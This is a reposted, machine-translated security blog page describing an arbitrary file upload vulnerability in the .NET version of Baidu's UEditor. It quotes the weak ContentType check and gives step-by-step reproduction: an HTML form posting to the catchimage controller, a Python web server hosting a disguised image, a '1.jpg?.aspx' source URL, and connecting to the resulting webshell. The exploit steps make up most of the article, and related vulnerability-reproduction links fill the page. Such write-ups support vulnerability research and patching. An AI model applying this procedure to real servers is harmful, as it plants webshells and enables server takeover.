Arbitrary file upload vulnerability in UEditor .Net version - Code World

Arbitrary file upload vulnerability in UEditor .Net version

Others 2021-03-30 06:35:12 views: null

Arbitrary file upload vulnerability in UEditor .Net version

1. Vulnerability introduction
Ueditor is a website editor developed by Baidu, and no follow-up development and updates have been made to it. The vulnerability only exists in the .net version of the editor.
The cause of the vulnerability is that only the ContentType is checked when obtaining image resources, which can bypass any file upload.
The Crawler method's check on source[] is only a ContentType

if (response.ContentType.IndexOf("image") == -1)
{
    
    
State = "Url is not an image";
return this;
}

Insert picture description here
2. The vulnerability reproduces
1. You can use the post method to directly upload files to the target website

<form action="http://IP:port/ueditor/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit"/>
</form>

Insert picture description here
2. Generate picture
1.jpg
3. Open the web service
python -m SimpleHTTPServer 8888
4. Enter the address
http://XXXX:8888/1.jpg?.aspx in shelladdr
5. Upload successfully

6. Pony address
http:/ /ip:port/ueditor/net/upload/image/20201127/6374211044232448561123135.asp
7. Connect to Pony
Insert picture description here

Guess you like

Origin blog.csdn.net/weixin_44146996/article/details/110641105

Arbitrary file upload vulnerability in UEditor .Net version

Arbitrary file upload vulnerability (introduction)

UFIDA NC Arbitrary File Upload Vulnerability Reproduced

Hongjing eHR Arbitrary File Upload Vulnerability

Arbitrary File Upload Vulnerability in SecGate 3600 Firewall

Arbitrary file upload vulnerability mining (getshell)

Weblogic arbitrary file upload vulnerability (CVE-2018-2894) reproduction

CVE-2018-2894 weblogic arbitrary file upload vulnerability recurrence

Arbitrary file upload vulnerability in Zhiyuan OA-ajax.do

UFIDA KSOA ImageUpload Arbitrary File Upload Vulnerability Recurrence + Exploitation

Hongjing eHR arbitrary file upload vulnerability recurrence (0day)

There is an arbitrary file upload vulnerability in the comprehensive management platform of Dahua Smart Park

Hikvision iVMS integrated security system arbitrary file upload vulnerability reappears

Tongda OA arbitrary file deletion / OA unauthorized access + arbitrary file upload RCE vulnerability reproduction

Arbitrary File Download Vulnerability

Vulnerability recurrence - UFIDA NC arbitrary file upload vulnerability (with vulnerability detection script)

Vulnerability recurrence - there is an arbitrary file reading vulnerability in the iDocview doc/upload interface (vulnerability detection script attached)

[Vulnerability Recurrence] WordPress plugin wp-file-manager arbitrary file upload vulnerability (CVE-2020-25213)

Vulnerability reproduction - Tomcat arbitrary file upload vulnerability (CVE-2017-12615)

[vulhub vulnerability recurrence] CVE-2018-2894 Weblogic arbitrary file upload vulnerability

Weblogic Vulnerability (4) CVE-2018-2894 Arbitrary File Upload Vulnerability

Arbitrary file reading and vulnerability reproduction

WebLogic arbitrary file upload _CVE-2018-2894 A remote code execution vulnerability reproducibility

Weblogic two unauthorized arbitrary file upload vulnerability (CVE-2018-2894)

CVE-2017-12615 Tomcat PUT arbitrary file upload vulnerability exploit tutorial

Vmware vcenter unauthorized arbitrary file upload vulnerability (CVE-2021-21972)

Dream weaving DedeCMS select_soft_post.php arbitrary file upload vulnerability solution

Dream weaving DedeCMS select_soft_post.php arbitrary file upload vulnerability solution

Weaving dream dedecms background file media_add.php arbitrary upload vulnerability solution

Weaving dream dedecms background file media_add.php arbitrary upload vulnerability solution

Recommended

Ranking

Empire cms smart tag calls four first-level recommended articles, starting from the fourth article

Linux environment installation and configuration Elasticsearch7.17

Big Data processing architecture and Lambda Kappa architecture

Explore the top of the AI large model platform - Wenxin Qianfan

Beijing car PK10 lucky airship Guanya size and value of the odd and even tips

W3B x Sui Hacker House｜In-depth understanding of Sui and Move language

Know almost Ko Chan: Chinese what any decent open source software products? (Finishing from my original answer)

Comprehensively improve AD domain security authentication | Zhuyun IDaaS

Android Update Engine Analysis (24) What happened when making the downgrade package?

Spark Architecture and Operating Mechanism (1) - System Architecture

Daily

More

2024-05-07(34)

2024-05-06(6)

2024-05-05(0)

2024-05-04(18)

2024-05-03(8)

2024-05-02(0)

2024-05-01(4)

2024-04-30(36)

2024-04-29(5)

2024-04-28(12)